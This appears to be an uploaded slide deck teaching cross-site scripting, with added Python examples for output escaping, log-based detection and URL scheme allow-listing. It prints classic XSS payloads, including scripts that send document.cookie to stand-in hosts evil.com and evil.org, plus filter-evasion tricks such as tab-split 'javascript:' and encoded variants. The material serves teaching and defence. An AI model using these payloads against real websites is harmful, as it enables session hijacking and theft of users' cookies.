XSS

Cross-site scripting (XSS) is a type of injection attack where malicious scripts are injected into trusted websites. XSS occurs when data entered by users is displayed within a web page without being validated, sanitized or encoded. This enables attackers to execute scripts in the victim's browser and steal user cookies, session tokens or other sensitive information. The document discusses examples of XSS attacks, variations, ways to circumvent input filtering, and tools that can be used to test for XSS vulnerabilities. It emphasizes that proper input validation is needed to prevent XSS and secure websites against such attacks.

Uploaded by: anil
License: Attribution Non-Commercial (BY-NC)

First Some Credit

- David Zimmer: “Real World XSS” article.
- Gunter Ollmann: “HTML Code Injection and XSS”
- Amit Klein: “XSS Explained”
- GNUCITIZEN.ORG

Cross Site Scripting

Definition of XSS

- An app level attack
- Involves 3 parties
- Want diverse and personalized delivery
  - but web app fails to validate user supplied input
- Marc Slemko: XSS doesn’t have to be XS, or S.
- Goal: STEAL!!!

Example

- vulscript at vulsite, reads HTTP req, echoes back w/o first sanitizing…
- GET /vulscript.cgi?name=dylim HTTP/1.0
  Host: www.vulsite.org
- <HTML><Title>Welcome</Title> Hi dylim… </HTML>
- Attacker can craft link which causes the web browser to access vulsite, invoke vulscript, with data=evilscript.
- Note that evilscript can access my cookies related to vulsite.

Example cont’d

- Such a link could be:
  http://www.vulsite.org/vulscript.cgi?name=<script>alert(document.cookie)</script>
- Or
  <script>window.open("http://evil.com/stealcookie.cgi?cookie="+document.cookie)</script>

Variations

- Other HTML tags
  <b onMouseOver="self.location.href='http://evil.org/'"> bolded text</b>
- POST, HTTP headers (referrer), path of HTTP req (e.g. if error page returns the erroneous path)
- Typical formatting
  - <img src = "malicious.js">
  - <script>alert('hacked')</script>
  - <iframe = "malicious.js">
  - <script>document.write('<img src="http://evil.org/'+document.cookie+'")</script>
  - <a href="javascript:…">click-me</a>
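The echo bug on these two slides, as an added example that is not part of the original deck: a Python stand-in for vulscript (the slide's CGI script) that reflects the name parameter verbatim, beside the same page with HTML entity encoding applied on output. The request target and page strings are constructed here from the slide; the function names are assumptions.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request target modelled on the slide's vulscript example.
# The query value is the slide's cookie-reading payload, percent-encoded
# the way a browser would send it.
REQUEST_TARGET = "/vulscript.cgi?name=%3Cscript%3Ealert(document.cookie)%3C/script%3E"


def name_from_request(target: str) -> str:
    """Pull the 'name' query parameter out of a request target (decoded)."""
    qs = urlsplit(target).query
    return parse_qs(qs, keep_blank_values=True).get("name", [""])[0]


def vulnerable_page(name: str) -> str:
    """vulscript as described on the slide: echoes the parameter back verbatim,
    so markup in the parameter becomes markup in the page."""
    return f"<HTML><Title>Welcome</Title> Hi {name}... </HTML>"


def hardened_page(name: str) -> str:
    """Same page, but the untrusted value is entity-encoded for HTML body
    context: '<', '>', '&' and quotes can no longer open a tag or attribute."""
    return f"<HTML><Title>Welcome</Title> Hi {html.escape(name, quote=True)}... </HTML>"


def contains_script_tag(page: str) -> bool:
    """Crude check used only to show the difference between the two pages."""
    return "<script" in page.lower()
```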

Variations

- Flash! attack…
- ActionScript, getURL()

What about…

- data:text/html;base64,PHNjcmlwdD4NCmFsZXJ0KCJTZWxmLWNvbnRhaW5lZCBYU1MiKTsNCjwvc2NyaXB0Pg==
  (the base64 decodes to <script>alert("Self-contained XSS");</script>)
- Self contained! i.e. doesn’t require vulnerable web resource to echo input.
- allows dynamic creation of binary files from JavaScript (can create files containing malicious payload for exploiting overflow vulnerabilities.)

XSS as an attack vector

- Strengths
  - Can include very large audience w one injection point
  - Can force users to some action, and access info they can access
  - Can be hard to detect and slipped in quietly
  - Can be powerful for info display and alteration.
- Weaknesses
  - 95% can be avoided with proper filtering on any user supplied data (several tools)

Impact

- Theft of Account/Services
- User Tracking/Stats
- Browser/User exploitation
- Credentialed Misinformation
- Free Information Dissemination

Together with Phishing, etc…

- Only here! By everything for cheap.msg
- PayPal Urgent Problems with Account Information.msg
- Save the world.msg

Securing a site

- Input sanitation
  - Programmer needs to cover all possible input sources (query params, HTTP headers, etc)
  - Useless against vulnerabilities in 3rd party scripts/servers (e.g. err pages)
- Output filtering..
- App firewalls
  - Can cover all input methods in a generic way.
  - Intercepts XSS attacks before they reach the server.
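An added example (not from the deck) of the app-firewall idea on the Securing a site slide: a small request-level detector run over constructed access-log lines that carry the payloads shown on the earlier slides. Percent-decoding and control-character stripping happen before matching, so the encoded and line-break variants are seen in their decoded form; the log format, indicator names and function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not real traffic). Lines 2-4 carry the
# deck's reflected payloads; line 1 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2006:10:00:00 +0000] "GET /vulscript.cgi?name=dylim HTTP/1.0" 200 512
10.0.0.9 - - [01/Jan/2006:10:00:01 +0000] "GET /vulscript.cgi?name=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.0" 200 540
10.0.0.9 - - [01/Jan/2006:10:00:02 +0000] "GET /vulscript.cgi?name=%3Cb%20onMouseOver%3D%22self.location.href%3D'http://evil.org/'%22%3Ex HTTP/1.0" 200 530
10.0.0.9 - - [01/Jan/2006:10:00:03 +0000] "GET /search.cgi?q=javasc%09ript%3Aalert(1) HTTP/1.0" 200 300
"""

# Indicators taken from the slides: script tags, event-handler attributes,
# script URL schemes, and the \x3c / \x3e escapes used to dodge < > filters.
_PATTERNS = [
    ("script_tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("script_scheme", re.compile(r"\b(?:java|vb)script\s*:", re.I)),
    ("hex_angle_escape", re.compile(r"\\x3[ce]", re.I)),
]
_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def normalize(s: str) -> str:
    """Percent-decode twice (catches double encoding) and drop ASCII control
    characters so 'javasc<TAB>ript:' is matched as 'javascript:'."""
    s = unquote_plus(unquote_plus(s))
    return re.sub(r"[\x00-\x1f\x7f]", "", s)


def classify_request(target: str) -> list[str]:
    """Return the names of the XSS indicators that match a request target."""
    text = normalize(target)
    return [name for name, rx in _PATTERNS if rx.search(text)]


def scan_log(log: str) -> list[tuple[str, list[str]]]:
    """Return (request target, indicators) for every log line that matches."""
    hits = []
    for line in log.splitlines():
        m = _REQUEST.search(line)
        if not m:
            continue
        found = classify_request(m.group(1))
        if found:
            hits.append((m.group(1), found))
    return hits
```

This is a signature check and will miss novel encodings; it complements, and does not replace, output encoding in the application.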

Injection Points

- Active XSS attacks
  - Parameters passed in through query string arguments that get written directly to a page.
  - Anywhere an HTML form can be injected and have the user click a submit button
- Passive XSS attacks
  - Database storage!
  - Error pages!

Filtering

- Do you want to deny users the ability to use any form of HTML?
- If not, what do you filter?
  - <plaintext>
  - 10M x 10M image of attacker

Filtering

- Img src and href…
- Parse out src= element and validate it:
  - Remove quotes
  - Deny urls with ? Querystring ids, make sure no .cgi, .pl, etc.
  - Check the protocol and deny everything except http

Many ways to circumvent

- Simple filtering < and >
  - Use \x3c and \x3e
- Commenting out malicious code
  - Just close the comment filter: <script>- --></comment>…</script>
- Separate window handling
  - <a href="javascript:…">click-me</a> becomes:
    <a href="javascript:…" target="_blank">click-me</a>
  - <a href="javascript:..." foo="bar>click-me</a> becomes:
    <a href="javascript:..." foo="bar target="_blank">click-me</a>

XSS tips and tricks.

- script injection in an image src tag..
- SSL pages warn if script src comes from untrusted site,
  - but if you can upload say img that is actually .js commands..
- Embed nested quotes..
  - \’ or \”, or \u0022 \u0027
- Keyword filters that allow any js to execute are useless:
  - A = ‘navi’; B = ‘gator.userAgent’; alert(eval(A+B))

XSS tips and tricks..

- Limited input length + script block embed = unlimited script power (script src=)
- methods of script encoding.
  - <img src='vbscript:do%63ument.lo%63ation="http://a.b.com"'>
  - <IMG SRC="javascript:alert('test');">
  - <IMG SRC="javasc ript:alert('test');">
  - Line break trick
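An added example (not from the deck) that serves both the Filtering / Many ways to circumvent slides and the encoding tricks on the tips slides: instead of a deny-list that looks for the literal word "javascript", the check normalizes the attribute value the way a browser does (entity decoding, control-character stripping), then allows only http and https schemes and entity-encodes the value when emitting the attribute. Allowing https alongside the slide's "deny everything except http" is an assumption, and the function names are hypothetical.

```python
import html
import re

# Schemes an href/src may carry. The slide says "deny everything except
# http"; https is included here as an assumption for a modern site.
ALLOWED_SCHEMES = {"http", "https"}

# ASCII control characters and whitespace. Browsers discard these while
# reading the scheme, which is what the "javasc<TAB>ript:" trick relies on.
_CONTROL = re.compile(r"[\x00-\x20\x7f]")


def normalize_url(raw: str) -> str:
    """Normalize an attribute URL roughly as a browser will before it decides
    on a scheme: decode HTML entities (&#106;avascript: is javascript:) and
    drop control/whitespace characters. Percent-encoding is left alone on
    purpose: a percent-encoded scheme is not parsed as a scheme at all."""
    return _CONTROL.sub("", html.unescape(raw))


def scheme_of(url: str) -> str:
    """Return the lowercased scheme, or '' for a relative URL."""
    m = re.match(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):", url)
    return m.group(1).lower() if m else ""


def is_safe_link(raw: str) -> bool:
    """Allow-list check: only http/https, or a scheme-less relative URL, passes.
    javascript:, vbscript: and data: are rejected however they are dressed up."""
    scheme = scheme_of(normalize_url(raw))
    return scheme == "" or scheme in ALLOWED_SCHEMES


def safe_href(raw: str) -> str:
    """Build the href attribute: validate the scheme, then entity-encode the
    value so a payload such as  bar" target=  cannot close the quoted attribute."""
    if not is_safe_link(raw):
        raise ValueError("disallowed URL scheme")
    return 'href="%s"' % html.escape(raw, quote=True)
```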

Tools..

- AppShield, AppScan by Sanctum
- WebInspect
- Utilities by David Zimmer
  - E.g. script encoding
- XSS cheat sheet: http://ha.ckers.org/xss.html
- XSS Shell, Backweb, XSS proxy, BEEF…
